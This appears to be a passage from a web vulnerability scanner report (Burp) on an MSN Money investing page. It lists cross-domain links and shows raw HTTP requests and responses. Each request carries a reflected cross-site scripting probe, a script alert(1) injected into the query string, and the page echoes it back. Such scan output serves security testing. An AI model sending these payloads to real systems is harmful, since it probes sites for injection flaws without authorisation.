...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/">Why do employers care about your credit?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">Track your money</a>
...[SNIP]...
<li class="first"><a href="http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach">1,800 patient names, dates of service and certain clinical information exposed due to email breach</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car">1000 names and Social Security numbers of employees stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car">Laptop with 10,684 unencrypted names, Social Security numbers, address and salary for every employee receiving a W-2 stolen from employee's car</a>
...[SNIP]...
<li><a href="http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service">Documents containing sensitive personal details accidentally disposed of at a local recycling bank by the Scottish Court Service</a>
...[SNIP]...
<li class="last"><a href="http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker">1000 patient names, addresses, health and dental insurance member numbers, Social Security Numbers, dates of birth, dental care records, and dental x-rays may have been accessed by hacker</a>
...[SNIP]...
</div><a class="more" href="http://datalossdb.org/">Data provided by Open Security Foundation</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=does+credit+counseling+work&amp;form=money3">Does credit counseling really help?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.196. http://money.redacted/investing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:32:52 GMT
ntCoent-Length: 85022
Content-Length: 85022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408772&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/finance/stockscreener">Bing Stock Screener</a>
...[SNIP]...
</a><a class="logo" href="http://www.briefing.com"><img src="http://moneycentral.redacted/investor/common/images/brief4.gif" alt="Briefing.com" title="Briefing.com" />
...[SNIP]...
<li class="last"><a href="http://www.bing.com/finance/stockscreener">Bing stock screener</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.197. http://money.redacted/investing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:22 GMT
ntCoent-Length: 84983
Content-Length: 84983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296350842&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&amp;form=pt10">Bing: The volatility of oil</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/finance/stockscreener">Bing Stock Screener</a>
...[SNIP]...
</a><a class="logo" href="http://www.briefing.com"><img src="http://moneycentral.redacted/investor/common/images/brief4.gif" alt="Briefing.com" title="Briefing.com" />
...[SNIP]...
<li class="last"><a href="http://www.bing.com/finance/stockscreener">Bing stock screener</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.198. http://money.redacted/investing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:28:01 GMT
ntCoent-Length: 84983
Content-Length: 84983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296350882&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&amp;form=pt10">Bing: The volatility of oil</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/finance/stockscreener">Bing Stock Screener</a>
...[SNIP]...
</a><a class="logo" href="http://www.briefing.com"><img src="http://moneycentral.redacted/investor/common/images/brief4.gif" alt="Briefing.com" title="Briefing.com" />
...[SNIP]...
<li class="last"><a href="http://www.bing.com/finance/stockscreener">Bing stock screener</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.199. http://money.redacted/investing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:46:31 GMT
ntCoent-Length: 84981
Content-Length: 84981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351991&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&amp;form=pt10">Bing: The volatility of oil</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/finance/stockscreener">Bing Stock Screener</a>
...[SNIP]...
</a><a class="logo" href="http://www.briefing.com"><img src="http://moneycentral.redacted/investor/common/images/brief4.gif" alt="Briefing.com" title="Briefing.com" />
...[SNIP]...
<li class="last"><a href="http://www.bing.com/finance/stockscreener">Bing stock screener</a>
